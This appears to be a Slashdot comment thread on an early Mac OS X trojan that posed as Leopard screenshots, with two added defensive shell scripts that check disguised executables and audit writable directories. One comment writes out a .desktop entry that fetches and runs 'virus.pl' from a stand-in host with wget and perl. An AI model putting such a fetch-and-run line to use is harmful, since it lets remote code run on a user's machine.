First Mac OS X Virus?

bubba451 writes "MacRumors reports on what may be the first virus to affect Mac OS X, disguised as screenshots for the upcoming Mac OS X 10.5 Leopard. From the report: 'The resultant file decompresses into what appears to be a standard JPEG icon in Mac OS X but was actually a compiled Unix executable in disguise. An initial disassembly reveals evidence that the application is a virus or was designed to give that impression.' The virus is said to also spread via Bonjour instant messaging." Update: 02/17 00:09 GMT by P : This is not a virus, it is a simple Trojan Horse: it requires manual user interaction to launch the executable. See Andrew Welch's dissection.

577 comments

  1. Phew! by Anonymous Coward · · Score: 5, Funny

    Glad I just 'switched' to windows ;-)

    (fp?)

    1. Re:Phew! by Anonymous Coward · · Score: 5, Funny

      Should have waited. Dvorak is predicting that Apple will adopt Windows.

      I wish I also got paid to be a crackhead.

    2. Re:Phew! by pHatidic · · Score: 0, Flamebait

      I first learned about the Columbine Shooting when checking Slashdot. I first learned about the Columbia explosion by checking Slashdot. Now the first Mac virus. Slashdot brings me news of another life altering national tragedy.

    3. Re:Phew! by JohanAA · · Score: 1

      There's two ways to do this exploit on windows:
      1) it'll only work if the title says "Kournikova" or "Britney" - says a lot about windows users
      2) won't work if the title says "Windows Vista screenshot" - says a lot about Vista

      :-)

    4. Re:Phew! by didit · · Score: 2, Funny
      Dvorak is predicting that Apple will adopt Windows.
      Too bad he wrote his article before knowing about this trojan, otherwise he would have seen the big picture: Microsoft is behind this trojan and is going to use it to install Windows on Intel Macs. That's how Apple will "adopt" Windows.
    5. Re:Phew! by Anonymous Coward · · Score: 1, Funny

      That's the best laugh I've had all day:

      Will Apple Adopt Windows?

      This would be the most phenomenal turnabout in the history of desktop computing. There's just one fly in the ointment.

      ...the fly in the ointment being I'M ON CRACK! Seriously, he's getting his tips from some professor of psychology now! What's next - will he claim that tarot has shown him the future of Windows?

      I didn't have a very high opinion of him before reading that article, but it is now zero. He really will write anything, won't he? It doesn't even have to make sense, that article is non-sequitur after non-sequitur.

    6. Re:Phew! by Megane · · Score: 0, Troll
      Dvorak is predicting that Apple will adopt Windows.

      What a dumbass. First of all, he's about a month and a half early. (check the calendar)

      He's basing this on the ideas of someone else who thinks that removing Firewire from iPods means anything about the operating system Apple will use, never mind that Windows supports FireWire just fine, it's just that PCs have been slow to adopt it. And Apple wants to switch to Windows because they switched CPUs? You mean to one they had already been making sure for years that their own OS would run on? The one with a much faster update schedule than Microsoft could ever dream of?

      Wow. He's one of the oldest and biggest trolls out there in the computer-related press, and he's still trolling. Remember, his target audience is PC Magazine, read by the kind of folks who don't want to believe that it's a mistake for them to still be using Windows. So he's just providing more comfort to them that mean ol' Apple won't take their tattered, filthy, stinking, virus-laden security blanket away. Hey, switch my keyboard already, I'm writing just like Dvorak!

      --
      #naabhaprzrag, #sverubfr-000, #agi-fcbafberq, negvpyr[pynff*=' negvpyr-ary-'] { qvfcynl: abar !vzcbegnag; }
    7. Re:Phew! by Shanep · · Score: 1

      I first learned about the Columbine Shooting when checking Slashdot. I first learned about the Columbia explosion by checking Slashdot. Now the first Mac virus. Slashdot brings me news of another life altering national tragedy.

      I first heard about 9/11 while reading slashdot. That was shocking. Then I turned on the telly...

      --
      War crimes, torture, lies, illegal spying... Would someone give Bush a blowjob, already, so he can be impeached?
    8. Re:Phew! by Kittyglitter · · Score: 1

      Why? So you can be vulnerable to every other virus on the planet? :-)

    9. Re:Phew! by soft_guy · · Score: 0, Flamebait

      Dvorak has a long history of idiotic predictions, especially ones that bash the Mac.

      When the Mac first shipped, he predicted that it would fail because "no one knows what a font is" and "no one cares about having different sized type". He went on to say these things were too complicated for the average business user to understand.

      Throughout the 90s he pronounced Apple and the Mac to be "dead" many times. Oh, and he thinks the iBook only appeals to gay people.

      Dvorak is a big fat idiot.

      --
      Avoid Missing Ball for High Score
    10. Re:Phew! by madnuke · · Score: 1

      Same, it's nice to see the mactards saying how they will get the law enforcement agencies onto the 1337 Mac virus maker. So does the person that made this get $10,000 now? Wasn't that the prize for creating a Mac virus?

    11. Re:Phew! by Lars+T. · · Score: 1
      When the Mac first shipped, he predicted that it would fail because "no one knows what a font is" and "no one cares about having different sized type". He went on to say these things were too complicated for the average business user to understand.

      He was spot on, the way the average business user (ab)uses them is proof ;-)

      --

      Lars T.

      To the guy who modded me down from perfect to terrible Karma - Apple haters still suck

    12. Re:Phew! by Anonymous Coward · · Score: 0

      what the heck is this?
      I use a Mac because it's supposed to be easy to use!
      I have to DOWNLOAD this file, unzip it, click OK when warned that the file contains an application, double click on the "JPG," enter my admin password and it doesn't even have the decency to have a payload???
      What kind of user interface is this??
      I'm switching to Windows where the viruses at least properly propagate without the need of extensive user interaction.

    13. Re:Phew! by sulam · · Score: 2, Insightful

      Reading the Dvorak piece, you're right, he's on crack!

      I guess he doesn't realize just how many people buy Macs specifically because of the OS. He says they'd like to compete on "even ground" with Dell, Sony, etc -- when in fact the OS gives him a high ground to fight from. If Macs shipped with Windows, I bet at least half their current userbase would go from being grudgingly accepting of the steep premium you pay for their hardware to being rightly pissed off. The hardware isn't _that_ much better than what you can buy in the Windows world. Why would I continue to pay 30-50% more and what would I be getting that justified that, and is it something that would be compelling for IT purchasing? Somehow I don't think so.

      I say this as someone who has spent over $20K on Apple hardware out of my own pocket in the last 5 years. If Apple shipped with Windows instead of MacOS, that number would be closer to $2K (ie, just the iPods).

    14. Re:Phew! by Kelson · · Score: 1, Funny

      Apple will adopt Windows? I didn't realize Windows had been orphaned. Is it in foster care? What happened to its parents?

  2. Trojan Man? by green+pizza · · Score: 4, Interesting

    Sounds more like a trojan to me. But the question is, how in the world did they get it to show up as a JPEG image and still be executable? And does this script do any damage beyond the user's home directory? I.E., does it have some sort of a rootkit? Or does it simply prompt the user for the root/admin/sudo password?

    Somebody better wake up Apple and fix this application-looks-like-a-pretty-JPEG icon bug!!

    1. Re:Trojan Man? by Epaminondas+Pantulis · · Score: 5, Informative

      I guess they put the standard JPEG icon in the app's bundle...

    2. Re:Trojan Man? by fracai · · Score: 5, Informative

      There's this thing called reading the article... oh, right.

      It's a "JPEG" because the author was clever enough to paste the icon of a JPEG onto the executable.
      If the user is root, or possibly admin, the script writes files in /Library/InputManagers. If you aren't it does the same in the user Library.
      No kit, just a prompt.

      http://www.ambrosiasw.com/forums/index.php?showtopic=102379 as linked from MacRumors has a really good writeup on what is going on.

      --
      -- i am jack's amusing sig file
    3. Re:Trojan Man? by mstroeck · · Score: 5, Insightful

      Uhm, how are you proposing to "fix" this? You can give your application any icon you want, and as long as it looks even remotely like the native JPEG-icon, 95% of users won't notice.

      The only way would be some sort of flag that shows up on any icon that represents something executable, and that wouldn't be a fix but a completely new approach.

    4. Re:Trojan Man? by n3k5 · · Score: 4, Informative
      Sounds more like a trojan to me. But the question is, how in the world did they get it to show up as a JPEG image and still be executable?
      It definitely is a trojan, and a harmless one at that. It seems that if you have configured your computer correctly, you would have to enter your admin password in order to allow it to do any harm.

      It doesn't really disguise itself as an image. It just uses the OS X standard icon for images as its own icon. However, it does not have a jpeg extension and if you select it in the finder, you will not get a preview thumbnail, thus you would know that opening in the Preview application (which you would do by double clicking) cannot work. Maybe, if you have set your Finder not to display extensions, or just didn't pay attention, you would try to open it in another image viewer, which would fail and not do any harm.
      --
      but what do i know, i'm just a model.
    5. Re:Trojan Man? by Billosaur · · Score: 1
      Update: It appears that there is some debate about the classification of this application, and as it does require user activation, it appears to fall into the Trojan classification, rather than self-propagating through any particular vulnerability in OS X.

      Sounds like Mac users will need better protection.

      --
      GetOuttaMySpace - The Anti-Social Network
    6. Re:Trojan Man? by Anonymous Coward · · Score: 0

      How do you protect against "stupid user"??

    7. Re:Trojan Man? by green+pizza · · Score: 1, Funny

      How do you protect against "stupid user"??
      WebTV?
      Etch-a-Sketch?

    8. Re:Trojan Man? by squidguy · · Score: 2, Informative

      It definitely is a trojan, and a harmless one at that. It seems that if you have configured your computer correctly, you would have to enter your admin password in order to allow it to do any harm.

      You raise valid points here. This is a single instance, but undoubtedly more will come and we need to view these developments agnostically.
      Unfortunately, despite all best efforts to dissuade the novices, folks still tend to run as root or admin on their systems. A large percentage of Windows virii won't infect unless the user has admin privs, and unfortunately, M$ doesn't do a good enough job of dissuading this in their earlier platforms. Vista supposedly (I haven't hacked on it yet) does a better job of pushing least privilege and a *nix-like SU model (but since at least the 2000 platform, the RUN AS option existed) -- don't know how this'll work with the clueless crowd yet.
      The advantage of *nix is that it at least (in most cases) makes the user think twice about running as root.
      My point is - if we get novices (and some lazy experienced types) using OS X or RedHat or whatever, some will undoubtedly run as root, admin etc because they are too lazy or too clueless to run as least privileges. Ergo, the existence of OS X virii & trojans should not be taken lightly.

    9. Re:Trojan Man? by PFI_Optix · · Score: 1

      Microsoft has been struggling with this question for a long time ;)

      --
      120 characters for a sig? That's bloody useless.
    10. Re:Trojan Man? by n3k5 · · Score: 1
      It seems that if you have configured your computer correctly, you would have to enter your admin password in order to allow it to do any harm.
      Replying to myself here (and green pizza and squidguy) in order to clear up a mistake, I had misunderstood information from another source: Apparently you only have to enter your admin password if you are root (highly unlikely, so I don't know why some sources say 'most users' would have to enter it); otherwise it leaves your system files alone and only touches what it, running under your UID, has write access to. Which usually includes all apps you use. However it's still true that it doesn't do any significant harm. Infected apps stop working, but are easily identified and thus cleaned because of that 'oompa' xattr. Oh, and it only propagated via iChat, and even then only if you accept files that you haven't asked for.

      And if I may lump in a reply to squidguy's post: Lazy, clueless users don't run as root on Mac OS X, since it's not default. Figuring out how to run as root is way more difficult (thus more work, which lazy users loathe and clueless ones won't figure out) than simply entering your password any time you need it. Surely, many people will just enter it every time without thinking about it much, or checking which privileges are required exactly, but when the dialog pops up even though you didn't ask for having anything about your system changed, and still give your authorization ... well, then it really is your fault, not the system's.

      You are of course right when you say more malware will come, and we shouldn't take it too lightly, but as an OS X user, I'm not exactly losing my sleep over the issue either.
      --
      but what do i know, i'm just a model.
    11. Re:Trojan Man? by erwin · · Score: 2, Insightful

      make your system idiot-proof, and the world will make a better idiot....

    12. Re:Trojan Man? by CastrTroy · · Score: 4, Interesting

      Maybe we should be able to override the OS so that no matter what icon the executable file says it wants to display, the OS always shows an icon clearly depicting the fact that the file is an executable.

      --

      Anthropic principle: We see the universe the way it is because if it were different we would not be here to see it.
    13. Re:Trojan Man? by hunterx11 · · Score: 2, Interesting

      Actually, there was a similar trojan before disguised as an mp3. Apple responded to this in Tiger by making the .app extension of an application always appear at the end of its filename, ignoring any options to hide extensions. Unless this really has found some exploit, it is just a file.jpg.app.

      --
      English is easier said than done.
    14. Re:Trojan Man? by Pulse_Instance · · Score: 0, Troll

      They will fix it in the same way that they "fixed" the iPod nanos scratchable screen. Tell people not to use it in the manner that they used it before.

    15. Re:Trojan Man? by bogado · · Score: 1

      A sandbox for the browser would be nice. If the browser could not start any applications automatically, and even firefox can do this, it would certainly be more secure.

      --
      []'s Victor Bogado da Silva Lins

      ^[:wq

    16. Re:Trojan Man? by peragrin · · Score: 1

      So in other words. Power users who use unique icons for this will be unaffected as they will notice the difference. Hmm Of course that accounts for 5% of Macs which is a really low number.

      I feel special now :)

      --
      i thought once I was found, but it was only a dream.
    17. Re:Trojan Man? by Anonymous Coward · · Score: 1, Interesting

      The question is will this sort of exploit work with Linux?

      The main security problem that I can see it that the OS allows executables to reside anywhere. This can be stopped on Linux by using the noexec flag on the home and tmp drives, I assume the same is possible with OSX.

      Personally I think that exe files should only be allowed in either operating system folders or on the /usr partition, any hardcore users who want scripts in their home dir should change the settings themselves.

      If people want to install applications, they should be self contained files which are not executable but need a system binary to run. I think klix or klik is this theory for KDE. The sooner users unlearn clicking exe files to install programs the better.

      Apple and KDE/Gnome should set this as default for Linux now before the Linux monoculture grows too big and we see stuff like this affecting our Grandmas on Linux.

      By the way, I notice that the new low permission model in Vista is very flawed because the default action is just to prompt with yes/no when the user wants to escalate their privs. The box uses very weak language like 'are you sure you want to run this' there is nothing about entering a password which makes a user stop and think. The Vista popup is useless since it will be clicked without thinking (Like the stupid 'are you sure you want to send this to the recycle bin' dialog)

    18. Re:Trojan Man? by devonbowen · · Score: 4, Insightful
      Uhm, how are proposing to "fix" this?

      When I download a dmg file with Safari, I get a warning if the dmg contains an executable. (Not sure if that's Safari doing the warning or the code that mounts the archive or what.) Something like this in the code that unpacks tar files would go a long way toward fixing it.

      Devon

    19. Re:Trojan Man? by Kadin2048 · · Score: 4, Informative

      It's almost impossible for a clueless user to run as root on an OS X box.

      Actually running/logging-in as root requires either some non-trivial Terminal work, or going in through NetInfo Manager (a fairly intimidating config utility) and enabling the root account (which at least the time I did it, a few years ago, gave you some pretty stern warnings).

      That's not to say that you can't have root-like privs -- the default first user on a Mac is an "Administrator," which just means that they can sudo -s and become root temporarily. However to do this you have to authenticate for every action. (Or every 5 minutes or so.) The MacOS "Administrator" level user is not as powerful as the WinXP type of Administrator (which is effectively a root account). Macs have three levels of users: root, Admins (who can sudo), and everyone else (who can't).

      So yes, there are definitely ways that a clueless person could damage themselves with a trojan, if they just mindlessly type in their password into any box that comes up, regardless of the context in which they're being asked, but there is at least one more step stopping you from doing it compared to running on a Windows system.

      --
      "Ladies and gentlemen, my killbot features Lotus Notes and a machine gun. It is the finest available."
    20. Re:Trojan Man? by Vicsun · · Score: 4, Interesting

      An honest question (I'm pretty ignorant):

      How can a user differentiate between an executable file with a pretty icon and a jpeg in OSX (or Linux for that matter)? In Windows there are file extensions so a trojan with an icon will still have to be called something.exe in order to do any damage. How can I tell the difference between a binary file with an icon and a file that doesn't execute any code with the absence of extensions?

      Please don't laugh :(

    21. Re:Trojan Man? by Kadin2048 · · Score: 5, Insightful

      I was thinking about this. I can't imagine it would be all that hard -- there is already a visual flag applied to all "alias" (that's symlink) files, so it doesn't seem like it would be out of the question to do something similar for executables, based on the eXecute bit.

      However what I'm not sure about is how you'd make this work for MacOS bundles -- unlike UNIX applications they're not just single files; the thing that you click on in the Finder to launch a MacOS app (at least a Cocoa one) is actually a directory if you look at it in the Terminal, it just has the hidden suffix of ".app" (so for instance the program Mail in the finder is actually the directory/folder Mail.app). The actual executable file is normally buried somewhere within the folder -- usually like (appname).app/Contents/MacOS/executablefile.

      I suppose what you'd have to do is put the visual flag on if a file was either a directory ending in ".app", or if the regular eXecute bit was set on a file itself.

      --
      "Ladies and gentlemen, my killbot features Lotus Notes and a machine gun. It is the finest available."
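    Vicsun asks above how to tell a disguised executable from a real JPEG, and Kadin2048 proposes flagging anything that is either a directory ending in .app or a file with the execute bit set. The script below is an added example, not code from the thread or from any of the linked writeups. It applies those two tests and adds a third that a pasted-on icon cannot fake: the file's leading bytes. The magic numbers it matches are the standard ones (FF D8 FF for JPEG, 89 50 4E 47 for PNG, 7F 45 4C 46 for ELF, FE ED FA CE / CE FA ED FE / CA FE BA BE and the 64-bit variants for Mach-O, "#!" for scripts); the list of image extensions and the output wording are this example's own choices.

```shell
#!/bin/sh
# Added example (not from the thread): decide whether a file that claims to be
# an image would actually run code when double-clicked. Three tests are used:
#   1. a directory whose name ends in .app is an application bundle
#   2. a regular file with the execute bit set runs when opened
#   3. the first bytes of the file identify the real format, whatever the icon
# Works in plain POSIX sh on both OS X and Linux (head, od, tr, cut only).

file_kind() {
    # Classify by content, not by name or icon. Directories are handled first
    # because a Mac .app is a directory, not a file.
    if [ -d "$1" ]; then
        case "$1" in
            *.app) echo "app-bundle" ;;
            *)     echo "directory" ;;
        esac
        return 0
    fi
    magic=$(head -c 4 "$1" | od -An -tx1 | tr -d ' \n')
    case "$magic" in
        ffd8ff*)                                       echo "JPEG" ;;
        89504e47)                                      echo "PNG" ;;
        7f454c46)                                      echo "ELF-executable" ;;
        feedface|cefaedfe|feedfacf|cffaedfe|cafebabe)  echo "Mach-O-executable" ;;
        2321*)                                         echo "script" ;;  # "#!"
        *)                                             echo "unknown" ;;
    esac
}

looks_like_image() {
    # Does the name claim to be an image? The Finder can hide a trailing .app,
    # so "shot.jpg.app" shows up as "shot.jpg" and is treated as a claim too.
    case "$1" in
        *.jpg|*.jpeg|*.png|*.jpg.app|*.jpeg.app|*.png.app) return 0 ;;
        *) return 1 ;;
    esac
}

check_download() {
    # Exit status 0 = consistent with the name, 1 = disguised executable.
    f=$1
    kind=$(file_kind "$f")
    if looks_like_image "$f"; then
        case "$kind" in
            JPEG|PNG)
                if [ -x "$f" ]; then
                    echo "SUSPICIOUS: $f has image content but the execute bit is set"
                    return 1
                fi
                echo "OK: $f is a $kind"
                return 0 ;;
            *)
                echo "SUSPICIOUS: $f is named like an image but its content is $kind"
                return 1 ;;
        esac
    fi
    echo "INFO: $f is $kind"
    return 0
}

# Usage: check_download ~/Downloads/leopard_screenshots.jpg
```

    This is a heuristic for the specific trick the thread describes (a name and icon that say "image", content that says "program"), not a substitute for the Get Info "Kind" field or for not double-clicking unsolicited iChat transfers. A PNG or JPEG with the execute bit set is reported as suspicious because no image viewer ever needs it set.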
    22. Re:Trojan Man? by Digi-John · · Score: 1

      You can avoid all of these problems by shunning graphical file manager stuff in favor of the command line. That file that was supposed to be a jpeg--try opening it with "display suspiciousfile" and you'll get an error. The only way to run it from the command line would be to explicitly say "./suspiciousfile", probably only after changing permissions so it becomes executable.

      Ah, the joys of xterm.

      --
      Klingon programs don't timeshare, they battle for supremacy.
    23. Re:Trojan Man? by Anonymous Coward · · Score: 0

      Etch-a-Sketch?

      If you sneeze while holding it you probably have to restore your destroyed data from backup.

    24. Re:Trojan Man? by Ortega-Starfire · · Score: 5, Funny

      All you have to do is right click... oh, nm

      --
      ---- Liquid was a patriot ----
    25. Re:Trojan Man? by cortana · · Score: 2, Interesting

      On Linux (and other traditional Unixes) you must deliberately set the execute permission on a file before you can execute it.

    26. Re:Trojan Man? by moonbender · · Score: 1

      I don't have a whole lot of experience with OS X, but I'd guess that executables are marked as such in their file info dialogue. Apart from that, executables are either folder bundles with the (hidden?) .app extension or any other file set to be executable via the standard Unix/Posix way.

      On a sidenote, standard Windows configuration hides known file extension - including .exe. Also, .exe is far from the only way executable code may be started, there's also the old .bat, and .cmd and a number of scripting files which are executed on a double click. As far as I know, all of these are hidden by default. An easy way to determine what will happen on a double click without having to be aware of the extension is right-clicking the file and checking for the bold entry in the context menu. If it says something like "execute script", well, you figure it out.

      --
      Switch back to Slashdot's D1 system.
    27. Re:Trojan Man? by Kadin2048 · · Score: 1

      Safari does not automatically start any executables without prompting, at least that I've ever seen.

      It will also prompt you before completing the download of a disk image file which contains an executable (although I'm not sure whether if you click "cancel" at this point if it deletes the file completely, or just stops it from being mounted). So theoretically, if you were downloading something that you thought were screenshots, Safari would warn you that you were actually getting a program. The language that it uses is pretty straightforward, also. I think it says something like "The file you are downloading contains a program, which could potentially harm your computer. Do you want to continue?"

      You'd have to be pretty clueless for that not to give you pause, if you were downloading something that you KNEW wasn't a program. I don't doubt that some people are going to do it, but at a certain point you can't blame the OS for user stupidity. It's one thing if a system allows an action you take on the internet in a browser to hose your computer, it's quite another if it lets you download a file, click "Yes" when asked if they're sure they want to download, run a program, type their password, and their files get hosed. You can't prevent the latter from happening while still having the system be halfway useable.

      --
      "Ladies and gentlemen, my killbot features Lotus Notes and a machine gun. It is the finest available."
    28. Re:Trojan Man? by diegocgteleline.es · · Score: 1

      Somebody better wake up Apple and fix this application-looks-like-a-pretty-JPEG icon bug!!

      You're welcome, you can do the same with .desktop files in Linux: set the Name= and Icon= fields to something fancy. At some point I tested it and I was able to put things like "Run=wget foo.com/virus.pl; perl virus.pl", so you've got a virus just like Windows - market share doesn't allow such a virus to be successful of course, but the problem is the same as with Windows .exe files. In a perfect world .desktop files would require +x to be interpreted (just like you do with scripts) and we'd be safe and viruses couldn't spread through mailers, but good designs aren't that appealing for some open source coders these days it seems.

    29. Re:Trojan Man? by Megane · · Score: 4, Informative
      If the user is root, or possibly admin, the script writes files in /Library/InputManagers.

      Um, why is my /Library chmod 775? It's that way on all four OS X machines that I can reach via SSH right now, two 10.4.x and two 10.3.x. Because there is no /Library/InputManagers in my /Library, so any program running under an admin account on my machine could create one. Admittedly, /Library/StartupItems being group-writable would be a much worse security violation (stuff in there runs as root at startup), and I have seen cases where installers will create one chmod 775 or 777, but I don't see any reason why a program that isn't setuid root (in other words, requiring the security dialog first) should be able to create new directories or drop files into /Library.

      Anyhow, this is not a virus, it's a trojan. A virus attaches itself to existing executables (boot blocks included in the definition of "executables"). This is a trojan, and if it replicates, then it's a file-propagating worm (as opposed to the e-mail- and network- propagating worms that plague Windows). So far there is still no malware for OS X that doesn't depend upon human stupidity for propagation. Whether that be saving an e-mail attachment to disk and then double-clicking on its icon on the desktop (this thing won't auto-open while reading e-mail), or simply using bad username/password combinations allowing a brute-force break-in over SSH, there is still no sign of any kind of fully-automated malware for OS X.

      In the meantime, I'm going to be doing a lot of "sudo chmod 755 /Library".

      --
      #naabhaprzrag, #sverubfr-000, #agi-fcbafberq, negvpyr[pynff*=' negvpyr-ary-'] { qvfcynl: abar !vzcbegnag; }
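    Megane's observation above, that /Library is mode 775 on every machine he can reach, is quick to check from a shell. The script below is an added example and not from the thread; it parses the mode string printed by ls -ld, so the same code runs on OS X and Linux (stat(1) takes different flags on the two), and the directory list it audits by default is just the three named in the post. Nothing is changed: it only reports, and the fix he names (sudo chmod 755) stays a separate, deliberate step.

```shell
#!/bin/sh
# Added example (not from the thread): report directories whose mode lets the
# group or everyone create or replace files in them. Any such directory that
# other processes load code from (InputManagers, StartupItems) lets a program
# running as an ordinary admin user plant code without the security dialog.

dir_mode() {
    # First ten characters of ls -ld, e.g. "drwxrwxr-x". A trailing "@" or
    # "+" for xattrs/ACLs on OS X is cut off, which is what we want.
    ls -ld "$1" | cut -c1-10
}

is_group_or_other_writable() {
    # Character 6 is the group write bit, character 9 the "other" write bit.
    m=$(dir_mode "$1")
    g=$(printf '%s' "$m" | cut -c6)
    o=$(printf '%s' "$m" | cut -c9)
    [ "$g" = "w" ] || [ "$o" = "w" ]
}

audit_dirs() {
    # Prints one line per writable directory. Returns the number found, so
    # 0 means clean and a non-zero status means something needs attention.
    found=0
    for d in "$@"; do
        [ -d "$d" ] || continue          # skip paths that do not exist here
        if is_group_or_other_writable "$d"; then
            echo "WRITABLE $(dir_mode "$d") $d"
            found=$((found + 1))
        fi
    done
    return $found
}

# Default audit set: the directories the thread discusses. Extend as needed.
audit_dirs /Library /Library/InputManagers /Library/StartupItems \
    || echo "$? director(y/ies) writable by group or others"
```

    Run it as any user; reading modes needs no privilege. A directory it flags is one where dropping a file is possible without the password prompt, which is exactly the distinction the post draws between what needs the security dialog and what does not.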
    30. Re:Trojan Man? by Kadin2048 · · Score: 2, Informative

      Um, I'm admittedly not looking at my OS X box right now, but unless this change was made in the 10.4.4 update (the one released just in the past few days via Software Update), the ".app" extension is hidden on most Applications, at least with the general "hide extensions" preference turned on in the Finder.

      The MP3Concept trojan didn't disguise itself because the Finder was hiding the ".app" extension, anyway. It's filename really was "MP3Concept.mp3". If you had gone in and looked at it via the Terminal, that's what you would have seen.

      It was an executable because of the way its metadata was set: it had a "type" of APPL, for application, thus it would execute when double-clicked. The icon came because the creator had simply given the iTunes MP3 file icon as the application bundle's custom icon resource (this is the same way a legitimate application sets itself to a custom icon). It wasn't being assigned automatically by the Finder or anything else. This type of exploit isn't really new, it would have worked just as well on MacOS9 (and probably even better); back in the day there were lots of dumb little tricks that you could do to take advantage of the same thing (you could make small applications that put up rude dialog boxes, for instance, and disguise them as documents).

      And (as screenshots on the link below show), if you had looked at the MP3Concept.mp3 file in the Finder's list view, it would be correctly reported as an Application, not a Document. (Because the Finder looks at the file metadata in addition to the filename, when determining what it is.)

      Without appending ".app" to the end of every Carbon application out there still in use, which in some cases might cause problems, and then not letting the user turn off the displaying of extensions (which would piss off a lot of longtime Mac users), I don't think there's really any way to prevent this. I find the change you're saying Apple made somewhat doubtful, although I'm open to any evidence you have.

      More info on the MP3Concept trojan:
      http://daringfireball.net/2004/04/crying_wolf

      --
      "Ladies and gentlemen, my killbot features Lotus Notes and a machine gun. It is the finest available."
    31. Re:Trojan Man? by Shanep · · Score: 2, Informative

      All you have to do is right click... oh, nm

      Humour aside, that is actually correct. Right click if you have a two or more button mouse and choose Get Info. Notice "Kind" will state "Application". If you have a single button mouse you can Control click in place of right clicking. If it is a JPG then it should say "JPEG image".

      --
      War crimes, torture, lies, illegal spying... Would someone give Bush a blowjob, already, so he can be impeached?
    32. Re:Trojan Man? by ioErr · · Score: 3, Informative

      In the old days Mac OS used to distinguish aliases from normal files and folders by showing their names in italics. That was a very good thing, but unfortunately it has been replaced by a tiny Windows-style arrow in the icon's bottom left corner instead. On the other hand, there was never an easy way to tell applications from documents or folders at a glance which always bothered me, not so much because of the threat of trojans as because you don't want to accidentally launch another program which just happened to look like a text document (curse those readmes) when you only have 10 MB of RAM.

      Anyway, back to the present. A simple, welcome solution, would be to just show the names of applications in bold text. That would be helpful to power user and novice alike, and it would probably also look good.

    33. Re:Trojan Man? by NutscrapeSucks · · Score: 1

      Sounds more like a trojan to me.

      Just to be clear, 98% of the "viruses" which affect Windows boxes are actually trojans, and the other 2% are worms. There's very few true viruses anymore for any platform.

      --
      Whenever I hear the word 'Innovation', I reach for my pistol.
    34. Re:Trojan Man? by level_headed_midwest · · Score: 1

      In Linux, executables don't generally have extensions on them. But you can easily tell what a file is by looking at its properties at the MIME type. It will not say, "JPEG Image" but "application/binary."

      --
      Just "gittin-r-done," day after day.
    35. Re:Trojan Man? by Syberghost · · Score: 2, Interesting

      I can't figure out how this qualifies as a virus and this doesn't.

      Either this isn't a virus, or the "first" was two years ago.

    36. Re:Trojan Man? by NutscrapeSucks · · Score: 1, Interesting

      Apart from that, executables are either folder bundles with the (hidden?) .app extension or any other file set to be executable via the standard Unix/Posix way.

      Actually, I get the impression that this is an old-style Mac executable, which does not use the .app extension. Instead it uses a hidden "APPL" file type which is not normally visible to the user. This is a fundamental issue that goes back to the original MacOS in 1984 -- there's just no easy way to distinguish an executable from a non-executable file on Mac systems.

      Furthermore, it appears that the default perms on OSX provide +X access to everyone, everywhere so traditional *nix-style "chmod" is never needed.

      --
      Whenever I hear the word 'Innovation', I reach for my pistol.
    37. Re:Trojan Man? by Megane · · Score: 1
      And if I may lump in a reply to squidguy's post: Lazy, clueless users don't run as root on Mac OS X, since it's not default.

      It's not only not the default, it is in fact very complicated to allow logins using the root account. Lazy, clued users don't do it either. Thanks to sudo and the security dialog, there is also no need to allow root logins. One important thing about OS X security is that there are absolutely no default accounts that allow logins. So anyone who wants to guess weak passwords over SSH also has to guess for account names. This means that they actually have to find out something about the system that they are trying to break into.

      Please, folks, don't use your login password as a password for web sites. Many times the password is sent in the clear or nearly so (base64 encoded), and is easily intercepted. If you use the same username and password on a web site as you do to log on to OS X (or Linux or any other *nix), you're begging to get hacked.

      --
      #naabhaprzrag, #sverubfr-000, #agi-fcbafberq, negvpyr[pynff*=' negvpyr-ary-'] { qvfcynl: abar !vzcbegnag; }
    38. Re:Trojan Man? by Shanep · · Score: 1

      It definitely is a trojan, and a harmless one at that. It seems that if you have configured your computer correctly, you would have to enter your admin password in order to allow it to do any harm.

      You have to enter the admin name and password to delete your own user files? I think not and those are the files that are valuable to me.

      I keep occasional compressed dd images of my OSX installs (from the shell in the OSX install media and a USB or FW drive), so I am not too fussed about losing an install; it's my own files which matter to me. I back them up too, but I don't want them stolen either.

      --
      War crimes, torture, lies, illegal spying... Would someone give Bush a blowjob, already, so he can be impeached?
    39. Re:Trojan Man? by Shanep · · Score: 1

      I should have mentioned that I'm referring to potential future malicious code using this sort of trickery and not to that in the article. I'm thinking more from the OSX point of view than this specific malicious code.

      --
      War crimes, torture, lies, illegal spying... Would someone give Bush a blowjob, already, so he can be impeached?
    40. Re:Trojan Man? by Kadin2048 · · Score: 4, Insightful

      Anyway, back to the present. A simple, welcome solution would be to just show the names of applications in bold text. That would be helpful to power users and novices alike, and it would probably also look good.

      I like it. Good idea.

      While we're at it, maybe they can give us back our aliases in italics at the same time; that was a nice 'no brainer' feature if I ever saw one.

      That will probably go over better with application developers than some sort of visual indicator on the application's icon that would mess up their pretty custom look. Bolded text is definitely the better way to go.

      --
      "Ladies and gentlemen, my killbot features Lotus Notes and a machine gun. It is the finest available."
    41. Re:Trojan Man? by qw(name) · · Score: 1

      you must deliberately set the execute permission on a file before you can execute it
      Unless, of course, the file is already executable.
    42. Re:Trojan Man? by larkost · · Score: 1

      This has the executable bit set... it comes out of the tgz package with it intact... just like what would happen on linux.

    43. Re:Trojan Man? by bogado · · Score: 1

      I am not saying executing the file itself. But if you download a .mp3 file, does it play automatically? It is because Safari has started an external program. The browser can be very fine, but imagine that the mp3 player has a flaw that can run executables? Then someone could hide malware in an mp3 file, but this does not concern only mp3; all the files that have 'viewers' can be affected.

      A sandbox that I was proposing, but did not write it down (so I am lazy :-P), was supposed to run both the browser and the helper application in a special environment, maybe something as simple as a 'nobody' user that has no rights over the real user data or even an emulated layer that has no access to anything in the computer.

      So I was lazy, did not specify what I meant and that was a bad post. :P No one is perfect. :-D

      --
      []'s Victor Bogado da Silva Lins

      ^[:wq

    44. Re:Trojan Man? by Eccles · · Score: 2, Informative

      Unfortunately, despite all best efforts to dissuade the novices, folks still tend to run as root or admin on their systems.

      That's true on Windows, because it's a PITA otherwise. There are plenty of apps that won't run except as admin, or unless you've somehow fixed some set of permissions that is not identified when you try (and fail) to run the app.

      I try to run not as admin on Windows. I installed an app called, I believe, FileTweak recently. Now every time I try to get a file's properties, I get a half-dozen alerts about not having the proper permissions before the properties pane. Woo hoo!

      Macs are much more usable without being admin, which is one reason I'm about to get an iMac.

      --
      Ooh, a sarcasm detector. Oh, that's a real useful invention.
    45. Re:Trojan Man? by jscotta44 · · Score: 1

      How is "display suspicious file" any different than opening suspicious file in a viewer like Preview on the Mac? Preview will not run an executable any more than the "display" command will. So how is the command line giving you more protection?

